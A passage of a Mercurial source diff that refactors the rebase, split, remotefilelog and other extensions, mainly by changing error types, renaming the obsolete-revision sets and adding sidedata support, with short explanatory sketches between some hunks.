+ b'rebase.force-in-memory-merge',
+ default=False,
+)
# Note for extension authors: ONLY specify testedwith = 'ships-with-hg-core' for
# extensions which SHIP WITH MERCURIAL. Non-mainline extensions should
# be specifying the version(s) of Mercurial they are tested with, or
@@ -136,7 +144,7 @@
return smartset.baseset()
dests = destutil.orphanpossibledestination(repo, src)
if len(dests) > 1:
- raise error.Abort(
+ raise error.StateError(
_(b"ambiguous automatic rebase: %r could end up on any of %r")
% (src, dests)
)
@@ -197,8 +205,8 @@
self.skipemptysuccessorf = rewriteutil.skip_empty_successor(
repo.ui, b'rebase'
)
- self.obsoletenotrebased = {}
- self.obsoletewithoutsuccessorindestination = set()
+ self.obsolete_with_successor_in_destination = {}
+ self.obsolete_with_successor_in_rebase_set = set()
self.inmemory = inmemory
self.dryrun = dryrun
self.stateobj = statemod.cmdstate(repo, b'rebasestate')
@@ -340,25 +348,33 @@
return data
- def _handleskippingobsolete(self, obsoleterevs, destmap):
- """Compute structures necessary for skipping obsolete revisions
-
- obsoleterevs: iterable of all obsolete revisions in rebaseset
- destmap: {srcrev: destrev} destination revisions
- """
- self.obsoletenotrebased = {}
+ def _handleskippingobsolete(self):
+ """Compute structures necessary for skipping obsolete revisions"""
+ if self.keepf:
+ return
if not self.ui.configbool(b'experimental', b'rebaseskipobsolete'):
return
- obsoleteset = set(obsoleterevs)
+ obsoleteset = {r for r in self.state if self.repo[r].obsolete()}
(
- self.obsoletenotrebased,
- self.obsoletewithoutsuccessorindestination,
- obsoleteextinctsuccessors,
- ) = _computeobsoletenotrebased(self.repo, obsoleteset, destmap)
- skippedset = set(self.obsoletenotrebased)
- skippedset.update(self.obsoletewithoutsuccessorindestination)
- skippedset.update(obsoleteextinctsuccessors)
+ self.obsolete_with_successor_in_destination,
+ self.obsolete_with_successor_in_rebase_set,
+ ) = _compute_obsolete_sets(self.repo, obsoleteset, self.destmap)
+ skippedset = set(self.obsolete_with_successor_in_destination)
+ skippedset.update(self.obsolete_with_successor_in_rebase_set)
_checkobsrebase(self.repo, self.ui, obsoleteset, skippedset)
+ allowdivergence = self.ui.configbool(
+ b'experimental', b'evolution.allowdivergence'
+ )
+ if allowdivergence:
+ self.obsolete_with_successor_in_rebase_set = set()
+ else:
+ for rev in self.repo.revs(
+ b'descendants(%ld) and not %ld',
+ self.obsolete_with_successor_in_rebase_set,
+ self.obsolete_with_successor_in_rebase_set,
+ ):
+ self.state.pop(rev, None)
+ self.destmap.pop(rev, None)
def _prepareabortorcontinue(
self, isabort, backup=True, suppwarns=False, dryrun=False, confirm=False
@@ -366,6 +382,8 @@
self.resume = True
try:
self.restorestatus()
+ # Calculate self.obsolete_* sets
+ self._handleskippingobsolete()
self.collapsemsg = restorecollapsemsg(self.repo, isabort)
except error.RepoLookupError:
if isabort:
@@ -396,15 +414,6 @@
if not destmap:
return _nothingtorebase()
- rebaseset = destmap.keys()
- if not self.keepf:
- try:
- rewriteutil.precheck(self.repo, rebaseset, action=b'rebase')
- except error.Abort as e:
- if e.hint is None:
- e.hint = _(b'use --keep to keep original changesets')
- raise e
-
result = buildstate(self.repo, destmap, self.collapsef)
if not result:
@@ -416,7 +425,7 @@
if self.collapsef:
dests = set(self.destmap.values())
if len(dests) != 1:
- raise error.Abort(
+ raise error.InputError(
_(b'--collapse does not work with multiple destinations')
)
destrev = next(iter(dests))
@@ -430,6 +439,20 @@
if dest.closesbranch() and not self.keepbranchesf:
self.ui.status(_(b'reopening closed branch head %s\n') % dest)
+ # Calculate self.obsolete_* sets
+ self._handleskippingobsolete()
+
+ if not self.keepf:
+ rebaseset = set(destmap.keys())
+ rebaseset -= set(self.obsolete_with_successor_in_destination)
+ rebaseset -= self.obsolete_with_successor_in_rebase_set
+ try:
+ rewriteutil.precheck(self.repo, rebaseset, action=b'rebase')
+ except error.Abort as e:
+ if e.hint is None:
+ e.hint = _(b'use --keep to keep original changesets')
+ raise e
+
self.prepared = True
def _assignworkingcopy(self):
@@ -461,14 +484,10 @@
for rev in self.state:
branches.add(repo[rev].branch())
if len(branches) > 1:
- raise error.Abort(
+ raise error.InputError(
_(b'cannot collapse multiple named branches')
)
- # Calculate self.obsoletenotrebased
- obsrevs = _filterobsoleterevs(self.repo, self.state)
- self._handleskippingobsolete(obsrevs, self.destmap)
-
# Keep track of the active bookmarks in order to reset them later
self.activebookmark = self.activebookmark or repo._activebookmark
if self.activebookmark:
@@ -490,19 +509,10 @@
def progress(ctx):
p.increment(item=(b"%d:%s" % (ctx.rev(), ctx)))
- allowdivergence = self.ui.configbool(
- b'experimental', b'evolution.allowdivergence'
- )
for subset in sortsource(self.destmap):
sortedrevs = self.repo.revs(b'sort(%ld, -topo)', subset)
- if not allowdivergence:
- sortedrevs -= self.repo.revs(
- b'descendants(%ld) and not %ld',
- self.obsoletewithoutsuccessorindestination,
- self.obsoletewithoutsuccessorindestination,
- )
for rev in sortedrevs:
- self._rebasenode(tr, rev, allowdivergence, progress)
+ self._rebasenode(tr, rev, progress)
p.complete()
ui.note(_(b'rebase merging completed\n'))
@@ -564,16 +574,13 @@
return newnode
- def _rebasenode(self, tr, rev, allowdivergence, progressfn):
+ def _rebasenode(self, tr, rev, progressfn):
repo, ui, opts = self.repo, self.ui, self.opts
ctx = repo[rev]
desc = _ctxdesc(ctx)
if self.state[rev] == rev:
ui.status(_(b'already rebased %s\n') % desc)
- elif (
- not allowdivergence
- and rev in self.obsoletewithoutsuccessorindestination
- ):
+ elif rev in self.obsolete_with_successor_in_rebase_set:
msg = (
_(
b'note: not rebasing %s and its descendants as '
@@ -583,8 +590,8 @@
)
repo.ui.status(msg)
self.skipped.add(rev)
- elif rev in self.obsoletenotrebased:
- succ = self.obsoletenotrebased[rev]
+ elif rev in self.obsolete_with_successor_in_destination:
+ succ = self.obsolete_with_successor_in_destination[rev]
if succ is None:
msg = _(b'note: not rebasing %s, it has no successor\n') % desc
else:
@@ -610,7 +617,7 @@
self.destmap,
self.state,
self.skipped,
- self.obsoletenotrebased,
+ self.obsolete_with_successor_in_destination,
)
if self.resume and self.wctx.p1().rev() == p1:
repo.ui.debug(b'resuming interrupted rebase\n')
@@ -722,7 +729,7 @@
self.destmap,
self.state,
self.skipped,
- self.obsoletenotrebased,
+ self.obsolete_with_successor_in_destination,
)
editopt = opts.get(b'edit')
editform = b'rebase.collapse'
@@ -1085,10 +1092,10 @@
with repo.wlock(), repo.lock():
rbsrt.restorestatus()
if rbsrt.collapsef:
- raise error.Abort(_(b"cannot stop in --collapse session"))
+ raise error.StateError(_(b"cannot stop in --collapse session"))
allowunstable = obsolete.isenabled(repo, obsolete.allowunstableopt)
if not (rbsrt.keepf or allowunstable):
- raise error.Abort(
+ raise error.StateError(
_(
b"cannot remove original changesets with"
b" unrebased descendants"
@@ -1112,6 +1119,8 @@
with ui.configoverride(overrides, b'rebase'):
return _dorebase(ui, repo, action, opts, inmemory=inmemory)
except error.InMemoryMergeConflictsError:
+ if ui.configbool(b'devel', b'rebase.force-in-memory-merge'):
+ raise
ui.warn(
_(
b'hit merge conflicts; re-running rebase without in-memory'
@@ -1210,14 +1219,16 @@
)
% help
)
- raise error.Abort(msg)
+ raise error.InputError(msg)
if rbsrt.collapsemsg and not rbsrt.collapsef:
- raise error.Abort(_(b'message can only be specified with collapse'))
+ raise error.InputError(
+ _(b'message can only be specified with collapse')
+ )
if action:
if rbsrt.collapsef:
- raise error.Abort(
+ raise error.InputError(
_(b'cannot use collapse with continue or abort')
)
if action == b'abort' and opts.get(b'tool', False):
@@ -1284,7 +1295,7 @@
cmdutil.bailifchanged(repo)
if ui.configbool(b'commands', b'rebase.requiredest') and not destf:
- raise error.Abort(
+ raise error.InputError(
_(b'you must specify a destination'),
hint=_(b'use: hg rebase -d REV'),
)
@@ -1378,7 +1389,7 @@
return None
if wdirrev in rebaseset:
- raise error.Abort(_(b'cannot rebase the working copy'))
+ raise error.InputError(_(b'cannot rebase the working copy'))
rebasingwcp = repo[b'.'].rev() in rebaseset
ui.log(
b"rebase",
@@ -1416,7 +1427,7 @@
elif size == 0:
ui.note(_(b'skipping %s - empty destination\n') % repo[r])
else:
- raise error.Abort(
+ raise error.InputError(
_(b'rebase destination for %s is not unique') % repo[r]
)
@@ -1449,7 +1460,7 @@
return nullrev
if len(parents) == 1:
return parents.pop()
- raise error.Abort(
+ raise error.StateError(
_(
b'unable to collapse on top of %d, there is more '
b'than one external parent: %s'
@@ -1649,7 +1660,7 @@
b"to force the rebase please set "
b"experimental.evolution.allowdivergence=True"
)
- raise error.Abort(msg % (b",".join(divhashes),), hint=h)
+ raise error.StateError(msg % (b",".join(divhashes),), hint=h)
def successorrevs(unfi, rev):
@@ -1752,7 +1763,7 @@
# /| # None of A and B will be changed to D and rebase fails.
# A B D
if set(newps) == set(oldps) and dest not in newps:
- raise error.Abort(
+ raise error.InputError(
_(
b'cannot rebase %d:%s without '
b'moving at least one of its parents'
@@ -1764,7 +1775,7 @@
# impossible. With multi-dest, the initial check does not cover complex
# cases since we don't have abstractions to dry-run rebase cheaply.
if any(p != nullrev and isancestor(rev, p) for p in newps):
- raise error.Abort(_(b'source is ancestor of destination'))
+ raise error.InputError(_(b'source is ancestor of destination'))
# Check if the merge will contain unwanted changes. That may happen if
# there are multiple special (non-changelog ancestor) merge bases, which
@@ -1826,7 +1837,7 @@
if revs is not None
)
)
- raise error.Abort(
+ raise error.InputError(
_(b'rebasing %d:%s will include unwanted changes from %s')
% (rev, repo[rev], unwanteddesc)
)
@@ -1971,7 +1982,7 @@
if destmap[r] not in srcset:
result.append(r)
if not result:
- raise error.Abort(_(b'source and destination form a cycle'))
+ raise error.InputError(_(b'source and destination form a cycle'))
srcset -= set(result)
yield result
@@ -1991,12 +2002,12 @@
if b'qtip' in repo.tags():
mqapplied = {repo[s.node].rev() for s in repo.mq.applied}
if set(destmap.values()) & mqapplied:
- raise error.Abort(_(b'cannot rebase onto an applied mq patch'))
+ raise error.StateError(_(b'cannot rebase onto an applied mq patch'))
# Get "cycle" error early by exhausting the generator.
sortedsrc = list(sortsource(destmap)) # a list of sorted revs
if not sortedsrc:
- raise error.Abort(_(b'no matching revisions'))
+ raise error.InputError(_(b'no matching revisions'))
# Only check the first batch of revisions to rebase not depending on other
# rebaseset. This means "source is ancestor of destination" for the second
@@ -2004,7 +2015,7 @@
# "defineparents" to do that check.
roots = list(repo.set(b'roots(%ld)', sortedsrc[0]))
if not roots:
- raise error.Abort(_(b'no matching revisions'))
+ raise error.InputError(_(b'no matching revisions'))
def revof(r):
return r.rev()
@@ -2016,7 +2027,7 @@
dest = repo[destmap[root.rev()]]
commonbase = root.ancestor(dest)
if commonbase == root:
- raise error.Abort(_(b'source is ancestor of destination'))
+ raise error.InputError(_(b'source is ancestor of destination'))
if commonbase == dest:
wctx = repo[None]
if dest == wctx.p1():
@@ -2109,7 +2120,7 @@
if ui.configbool(b'commands', b'rebase.requiredest'):
msg = _(b'rebase destination required by configuration')
hint = _(b'use hg pull followed by hg rebase -d DEST')
- raise error.Abort(msg, hint=hint)
+ raise error.InputError(msg, hint=hint)
with repo.wlock(), repo.lock():
if opts.get('update'):
@@ -2166,34 +2177,24 @@
commands.update(ui, repo)
else:
if opts.get('tool'):
- raise error.Abort(_(b'--tool can only be used with --rebase'))
+ raise error.InputError(_(b'--tool can only be used with --rebase'))
ret = orig(ui, repo, *args, **opts)
return ret
-def _filterobsoleterevs(repo, revs):
- """returns a set of the obsolete revisions in revs"""
- return {r for r in revs if repo[r].obsolete()}
-
+def _compute_obsolete_sets(repo, rebaseobsrevs, destmap):
+ """Figure out what to do about about obsolete revisions
-def _computeobsoletenotrebased(repo, rebaseobsrevs, destmap):
- """Return (obsoletenotrebased, obsoletewithoutsuccessorindestination).
-
- `obsoletenotrebased` is a mapping mapping obsolete => successor for all
+ `obsolete_with_successor_in_destination` is a mapping of obsolete => successor for all
obsolete nodes to be rebased given in `rebaseobsrevs`.
- `obsoletewithoutsuccessorindestination` is a set with obsolete revisions
- without a successor in destination.
-
- `obsoleteextinctsuccessors` is a set of obsolete revisions with only
- obsolete successors.
+ `obsolete_with_successor_in_rebase_set` is a set of obsolete revisions
+ without a successor in destination; rebasing them would cause divergence.
"""
- obsoletenotrebased = {}
- obsoletewithoutsuccessorindestination = set()
- obsoleteextinctsuccessors = set()
+ obsolete_with_successor_in_destination = {}
+ obsolete_with_successor_in_rebase_set = set()
- assert repo.filtername is None
cl = repo.changelog
get_rev = cl.index.get_rev
extinctrevs = set(repo.revs(b'extinct()'))
@@ -2205,29 +2206,25 @@
successors.remove(srcnode)
succrevs = {get_rev(s) for s in successors}
succrevs.discard(None)
- if succrevs.issubset(extinctrevs):
- # all successors are extinct
- obsoleteextinctsuccessors.add(srcrev)
- if not successors:
- # no successor
- obsoletenotrebased[srcrev] = None
+ if not successors or succrevs.issubset(extinctrevs):
+ # no successor, or all successors are extinct
+ obsolete_with_successor_in_destination[srcrev] = None
else:
dstrev = destmap[srcrev]
for succrev in succrevs:
if cl.isancestorrev(succrev, dstrev):
- obsoletenotrebased[srcrev] = succrev
+ obsolete_with_successor_in_destination[srcrev] = succrev
break
else:
# If 'srcrev' has a successor in rebase set but none in
# destination (which would be caught above), we shall skip it
# and its descendants to avoid divergence.
if srcrev in extinctrevs or any(s in destmap for s in succrevs):
- obsoletewithoutsuccessorindestination.add(srcrev)
+ obsolete_with_successor_in_rebase_set.add(srcrev)
return (
- obsoletenotrebased,
- obsoletewithoutsuccessorindestination,
- obsoleteextinctsuccessors,
+ obsolete_with_successor_in_destination,
+ obsolete_with_successor_in_rebase_set,
)
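
A minimal, self-contained sketch of the classification rule that the renamed
_compute_obsolete_sets helper above implements. The helper names here
(successors, extinct, isancestor) are hypothetical stand-ins for the
changelog queries the real code performs, not Mercurial APIs:

    def classify_obsolete(obsolete_revs, destmap, successors, extinct, isancestor):
        with_succ_in_destination = {}    # obsolete rev -> successor (or None)
        with_succ_in_rebase_set = set()  # skipped to avoid divergence
        for rev in obsolete_revs:
            succs = successors(rev)      # live successor revs of `rev`
            if not succs or succs <= extinct:
                # no successor, or only extinct ones: nothing to rebase onto
                with_succ_in_destination[rev] = None
            else:
                dest = destmap[rev]
                for s in succs:
                    if isancestor(s, dest):
                        # a successor already sits in the destination
                        with_succ_in_destination[rev] = s
                        break
                else:
                    # successor is in the rebase set but not in destination
                    if rev in extinct or any(s in destmap for s in succs):
                        with_succ_in_rebase_set.add(rev)
        return with_succ_in_destination, with_succ_in_rebase_set
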
--- a/hgext/releasenotes.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/releasenotes.py Tue Apr 20 11:01:06 2021 -0400
@@ -280,7 +280,7 @@
if b'.hgreleasenotes' in ctx:
read(b'.hgreleasenotes')
- return p[b'sections']
+ return p.items(b'sections')
def checkadmonitions(ui, repo, directives, revs):
--- a/hgext/relink.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/relink.py Tue Apr 20 11:01:06 2021 -0400
@@ -19,7 +19,10 @@
registrar,
util,
)
-from mercurial.utils import stringutil
+from mercurial.utils import (
+ stringutil,
+ urlutil,
+)
cmdtable = {}
command = registrar.command(cmdtable)
@@ -62,10 +65,11 @@
util, b'samedevice'
):
raise error.Abort(_(b'hardlinks are not supported on this system'))
- src = hg.repository(
- repo.baseui,
- ui.expandpath(origin or b'default-relink', origin or b'default'),
- )
+
+ if origin is None and b'default-relink' in ui.paths:
+ origin = b'default-relink'
+ path, __ = urlutil.get_unique_pull_path(b'relink', repo, ui, origin)
+ src = hg.repository(repo.baseui, path)
ui.status(_(b'relinking %s to %s\n') % (src.store.path, repo.store.path))
if repo.root == src.root:
ui.status(_(b'there is nothing to relink\n'))
--- a/hgext/remotefilelog/__init__.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/remotefilelog/__init__.py Tue Apr 20 11:01:06 2021 -0400
@@ -215,6 +215,8 @@
configitem(b'remotefilelog', b'backgroundprefetch', default=False)
configitem(b'remotefilelog', b'prefetchdelay', default=120)
configitem(b'remotefilelog', b'prefetchdays', default=14)
+# Other values include 'local' and 'none'. Any unrecognized value is treated as 'all'.
+configitem(b'remotefilelog', b'strip.includefiles', default='all')
configitem(b'remotefilelog', b'getfilesstep', default=10000)
configitem(b'remotefilelog', b'getfilestype', default=b'optimistic')
@@ -886,7 +888,7 @@
progress.update(count)
count += 1
try:
- path = ui.expandpath(os.path.normpath(path))
+ path = util.expandpath(os.path.normpath(path))
except TypeError as e:
ui.warn(_(b"warning: malformed path: %r:%s\n") % (path, e))
traceback.print_exc()
--- a/hgext/remotefilelog/connectionpool.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/remotefilelog/connectionpool.py Tue Apr 20 11:01:06 2021 -0400
@@ -8,7 +8,6 @@
from __future__ import absolute_import
from mercurial import (
- extensions,
hg,
pycompat,
sshpeer,
@@ -43,17 +42,19 @@
if conn is None:
- def _cleanup(orig):
- # close pipee first so peer.cleanup reading it won't deadlock,
- # if there are other processes with pipeo open (i.e. us).
- peer = orig.im_self
- if util.safehasattr(peer, 'pipee'):
- peer.pipee.close()
- return orig()
+ peer = hg.peer(self._repo.ui, {}, path)
+ if util.safehasattr(peer, '_cleanup'):
- peer = hg.peer(self._repo.ui, {}, path)
- if util.safehasattr(peer, 'cleanup'):
- extensions.wrapfunction(peer, b'cleanup', _cleanup)
+ class mypeer(peer.__class__):
+ def _cleanup(self, warn=None):
+ # close pipee first so peer.cleanup reading it won't
+ # deadlock, if there are other processes with pipeo
+ # open (i.e. us).
+ if util.safehasattr(self, 'pipee'):
+ self.pipee.close()
+ return super(mypeer, self)._cleanup()
+
+ peer.__class__ = mypeer
conn = connection(pathpool, peer)
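
The connectionpool hunk above replaces function wrapping with swapping the
instance's __class__. A quick sketch of that pattern (the names here are
illustrative only): it overrides one method on a single live object without
monkeypatching the class for every other peer:

    class Conn(object):
        def _cleanup(self):
            print('base cleanup')

    conn = Conn()

    class patched(conn.__class__):
        def _cleanup(self):
            print('close pipe first')  # extra behavior for this instance only
            return super(patched, self)._cleanup()

    conn.__class__ = patched
    conn._cleanup()  # -> close pipe first / base cleanup
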
--- a/hgext/remotefilelog/contentstore.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/remotefilelog/contentstore.py Tue Apr 20 11:01:06 2021 -0400
@@ -365,7 +365,7 @@
ledger.markdataentry(self, treename, node)
ledger.markhistoryentry(self, treename, node)
- for path, encoded, size in self._store.datafiles():
+ for t, path, encoded, size in self._store.datafiles():
if path[:5] != b'meta/' or path[-2:] != b'.i':
continue
--- a/hgext/remotefilelog/remotefilelog.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/remotefilelog/remotefilelog.py Tue Apr 20 11:01:06 2021 -0400
@@ -155,12 +155,12 @@
# text passed to "addrevision" includes hg filelog metadata header
if node is None:
node = storageutil.hashrevisionsha1(text, p1, p2)
- if sidedata is None:
- sidedata = {}
meta, metaoffset = storageutil.parsemeta(text)
rawtext, validatehash = flagutil.processflagswrite(
- self, text, flags, sidedata=sidedata
+ self,
+ text,
+ flags,
)
return self.addrawrevision(
rawtext,
@@ -306,6 +306,7 @@
assumehaveparentrevisions=False,
deltaprevious=False,
deltamode=None,
+ sidedata_helpers=None,
):
# we don't use any of these parameters here
del nodesorder, revisiondata, assumehaveparentrevisions, deltaprevious
@@ -333,6 +334,8 @@
baserevisionsize=None,
revision=revision,
delta=delta,
+ # Sidedata is not supported yet
+ sidedata=None,
)
def revdiff(self, node1, node2):
--- a/hgext/remotefilelog/remotefilelogserver.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/remotefilelog/remotefilelogserver.py Tue Apr 20 11:01:06 2021 -0400
@@ -164,24 +164,26 @@
b'.d'
):
n = util.pconvert(fp[striplen:])
- yield (store.decodedir(n), n, st.st_size)
+ d = store.decodedir(n)
+ t = store.FILETYPE_OTHER
+ yield (t, d, n, st.st_size)
if kind == stat.S_IFDIR:
visit.append(fp)
if scmutil.istreemanifest(repo):
- for (u, e, s) in repo.store.datafiles():
+ for (t, u, e, s) in repo.store.datafiles():
if u.startswith(b'meta/') and (
u.endswith(b'.i') or u.endswith(b'.d')
):
- yield (u, e, s)
+ yield (t, u, e, s)
# Return .d and .i files that do not match the shallow pattern
match = state.match
if match and not match.always():
- for (u, e, s) in repo.store.datafiles():
+ for (t, u, e, s) in repo.store.datafiles():
f = u[5:-2] # trim data/... and .i/.d
if not state.match(f):
- yield (u, e, s)
+ yield (t, u, e, s)
for x in repo.store.topfiles():
if state.noflatmf and x[0][:11] == b'00manifest.':
--- a/hgext/remotefilelog/shallowbundle.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/remotefilelog/shallowbundle.py Tue Apr 20 11:01:06 2021 -0400
@@ -67,7 +67,7 @@
shallowcg1packer, self, nodelist, rlog, lookup, units=units
)
- def generatefiles(self, changedfiles, *args):
+ def generatefiles(self, changedfiles, *args, **kwargs):
try:
linknodes, commonrevs, source = args
except ValueError:
@@ -92,7 +92,9 @@
[f for f in changedfiles if not repo.shallowmatch(f)]
)
- return super(shallowcg1packer, self).generatefiles(changedfiles, *args)
+ return super(shallowcg1packer, self).generatefiles(
+ changedfiles, *args, **kwargs
+ )
def shouldaddfilegroups(self, source):
repo = self._repo
@@ -102,6 +104,18 @@
if source == b"push" or source == b"bundle":
return AllFiles
+ # We won't actually strip the files, but we should put them in any
+ # backup bundle generated by strip (especially for cases like narrow's
+ # `hg tracked --removeinclude`, as failing to do so means that the
+ # "saved" changesets during a strip won't have their files reapplied and
+ # thus their linknode adjusted, if necessary).
+ if source == b"strip":
+ cfg = repo.ui.config(b'remotefilelog', b'strip.includefiles')
+ if cfg == b'local':
+ return LocalFiles
+ elif cfg != b'none':
+ return AllFiles
+
caps = self._bundlecaps or []
if source == b"serve" or source == b"pull":
if constants.BUNDLE2_CAPABLITY in caps:
@@ -176,9 +190,11 @@
repo.shallowmatch = original
-def addchangegroupfiles(orig, repo, source, revmap, trp, expectedfiles, *args):
+def addchangegroupfiles(
+ orig, repo, source, revmap, trp, expectedfiles, *args, **kwargs
+):
if not shallowutil.isenabled(repo):
- return orig(repo, source, revmap, trp, expectedfiles, *args)
+ return orig(repo, source, revmap, trp, expectedfiles, *args, **kwargs)
newfiles = 0
visited = set()
@@ -272,7 +288,7 @@
revisiondata = revisiondatas[(f, node)]
# revisiondata: (node, p1, p2, cs, deltabase, delta, flags, sidedata)
- node, p1, p2, linknode, deltabase, delta, flags = revisiondata
+ node, p1, p2, linknode, deltabase, delta, flags, sidedata = revisiondata
if not available(f, node, f, deltabase):
continue
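
A sketch of the strip-source decision added to shouldaddfilegroups above.
NoFiles/LocalFiles/AllFiles are assumed to be the constants the extension
already defines; b'none' falls through to the pre-existing serve/pull logic
rather than forcing an answer:

    NoFiles, LocalFiles, AllFiles = 0, 1, 2  # assumed shallowbundle constants

    def strip_file_policy(cfg, fall_through):
        # b'local' -> only local files; anything but b'none' -> all files
        # (b'all' and unrecognized values alike); b'none' defers.
        if cfg == b'local':
            return LocalFiles
        if cfg != b'none':
            return AllFiles
        return fall_through()
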
--- a/hgext/schemes.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/schemes.py Tue Apr 20 11:01:06 2021 -0400
@@ -52,7 +52,9 @@
pycompat,
registrar,
templater,
- util,
+)
+from mercurial.utils import (
+ urlutil,
)
cmdtable = {}
@@ -86,7 +88,7 @@
)
def resolve(self, url):
- # Should this use the util.url class, or is manual parsing better?
+ # Should this use the urlutil.url class, or is manual parsing better?
try:
url = url.split(b'://', 1)[1]
except IndexError:
@@ -137,7 +139,7 @@
)
hg.schemes[scheme] = ShortRepository(url, scheme, t)
- extensions.wrapfunction(util, b'hasdriveletter', hasdriveletter)
+ extensions.wrapfunction(urlutil, b'hasdriveletter', hasdriveletter)
@command(b'debugexpandscheme', norepo=True)
--- a/hgext/share.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/share.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,4 +1,4 @@
-# Copyright 2006, 2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2006, 2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/hgext/split.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/split.py Tue Apr 20 11:01:06 2021 -0400
@@ -12,7 +12,7 @@
from mercurial.i18n import _
from mercurial.node import (
- nullid,
+ nullrev,
short,
)
@@ -27,6 +27,7 @@
revsetlang,
rewriteutil,
scmutil,
+ util,
)
# allow people to use split without explicitly enabling rebase extension
@@ -69,57 +70,62 @@
if opts.get(b'rev'):
revlist.append(opts.get(b'rev'))
revlist.extend(revs)
- with repo.wlock(), repo.lock(), repo.transaction(b'split') as tr:
- revs = scmutil.revrange(repo, revlist or [b'.'])
- if len(revs) > 1:
- raise error.InputError(_(b'cannot split multiple revisions'))
+ with repo.wlock(), repo.lock():
+ tr = repo.transaction(b'split')
+ # If the rebase somehow runs into conflicts, make sure
+ # we close the transaction so the user can continue it.
+ with util.acceptintervention(tr):
+ revs = scmutil.revrange(repo, revlist or [b'.'])
+ if len(revs) > 1:
+ raise error.InputError(_(b'cannot split multiple revisions'))
- rev = revs.first()
- ctx = repo[rev]
- # Handle nullid specially here (instead of leaving for precheck()
- # below) so we get a nicer message and error code.
- if rev is None or ctx.node() == nullid:
- ui.status(_(b'nothing to split\n'))
- return 1
- if ctx.node() is None:
- raise error.InputError(_(b'cannot split working directory'))
+ rev = revs.first()
+ # Handle nullrev specially here (instead of leaving for precheck()
+ # below) so we get a nicer message and error code.
+ if rev is None or rev == nullrev:
+ ui.status(_(b'nothing to split\n'))
+ return 1
+ ctx = repo[rev]
+ if ctx.node() is None:
+ raise error.InputError(_(b'cannot split working directory'))
- if opts.get(b'rebase'):
- # Skip obsoleted descendants and their descendants so the rebase
- # won't cause conflicts for sure.
- descendants = list(repo.revs(b'(%d::) - (%d)', rev, rev))
- torebase = list(
- repo.revs(
- b'%ld - (%ld & obsolete())::', descendants, descendants
+ if opts.get(b'rebase'):
+ # Skip obsoleted descendants and their descendants so the rebase
+ # won't cause conflicts for sure.
+ descendants = list(repo.revs(b'(%d::) - (%d)', rev, rev))
+ torebase = list(
+ repo.revs(
+ b'%ld - (%ld & obsolete())::', descendants, descendants
+ )
)
- )
- else:
- torebase = []
- rewriteutil.precheck(repo, [rev] + torebase, b'split')
+ else:
+ torebase = []
+ rewriteutil.precheck(repo, [rev] + torebase, b'split')
- if len(ctx.parents()) > 1:
- raise error.InputError(_(b'cannot split a merge changeset'))
+ if len(ctx.parents()) > 1:
+ raise error.InputError(_(b'cannot split a merge changeset'))
- cmdutil.bailifchanged(repo)
+ cmdutil.bailifchanged(repo)
- # Deactivate bookmark temporarily so it won't get moved unintentionally
- bname = repo._activebookmark
- if bname and repo._bookmarks[bname] != ctx.node():
- bookmarks.deactivate(repo)
+ # Deactivate bookmark temporarily so it won't get moved
+ # unintentionally
+ bname = repo._activebookmark
+ if bname and repo._bookmarks[bname] != ctx.node():
+ bookmarks.deactivate(repo)
- wnode = repo[b'.'].node()
- top = None
- try:
- top = dosplit(ui, repo, tr, ctx, opts)
- finally:
- # top is None: split failed, need update --clean recovery.
- # wnode == ctx.node(): wnode split, no need to update.
- if top is None or wnode != ctx.node():
- hg.clean(repo, wnode, show_stats=False)
- if bname:
- bookmarks.activate(repo, bname)
- if torebase and top:
- dorebase(ui, repo, torebase, top)
+ wnode = repo[b'.'].node()
+ top = None
+ try:
+ top = dosplit(ui, repo, tr, ctx, opts)
+ finally:
+ # top is None: split failed, need update --clean recovery.
+ # wnode == ctx.node(): wnode split, no need to update.
+ if top is None or wnode != ctx.node():
+ hg.clean(repo, wnode, show_stats=False)
+ if bname:
+ bookmarks.activate(repo, bname)
+ if torebase and top:
+ dorebase(ui, repo, torebase, top)
def dosplit(ui, repo, tr, ctx, opts):
@@ -165,19 +171,26 @@
b'message': header + ctx.description(),
}
)
+ origctx = repo[b'.']
commands.commit(ui, repo, **pycompat.strkwargs(opts))
newctx = repo[b'.']
- committed.append(newctx)
+ # Ensure user didn't do a "no-op" split (such as deselecting
+ # everything).
+ if origctx.node() != newctx.node():
+ committed.append(newctx)
if not committed:
raise error.InputError(_(b'cannot split an empty revision'))
- scmutil.cleanupnodes(
- repo,
- {ctx.node(): [c.node() for c in committed]},
- operation=b'split',
- fixphase=True,
- )
+ if len(committed) != 1 or committed[0].node() != ctx.node():
+ # Ensure we don't strip a node if we produce the same commit as the
+ # one that already exists
+ scmutil.cleanupnodes(
+ repo,
+ {ctx.node(): [c.node() for c in committed]},
+ operation=b'split',
+ fixphase=True,
+ )
return committed[-1]
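
The split.py rework above opens the transaction by hand and wraps the body in
util.acceptintervention so that hitting conflicts closes (rather than aborts)
the transaction, letting the user continue. A simplified sketch of the
assumed semantics, with a stand-in exception type:

    import contextlib

    class InterventionRequired(Exception):
        """Stand-in for mercurial.error.InterventionRequired."""

    @contextlib.contextmanager
    def acceptintervention(tr):
        # Commit the transaction even when the operation stops for user
        # intervention, so the interrupted state survives; any other
        # exception still aborts as usual.
        try:
            yield
            tr.close()
        except InterventionRequired:
            tr.close()
            raise
        except Exception:
            tr.abort()
            raise
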
--- a/hgext/sqlitestore.py Thu Mar 25 19:06:28 2021 -0400
+++ b/hgext/sqlitestore.py Tue Apr 20 11:01:06 2021 -0400
@@ -54,6 +54,7 @@
from mercurial.node import (
nullid,
nullrev,
+ sha1nodeconstants,
short,
)
from mercurial.thirdparty import attr
@@ -288,6 +289,7 @@
baserevisionsize = attr.ib()
revision = attr.ib()
delta = attr.ib()
+ sidedata = attr.ib()
linknode = attr.ib(default=None)
@@ -304,6 +306,7 @@
"""Implements storage for an individual tracked path."""
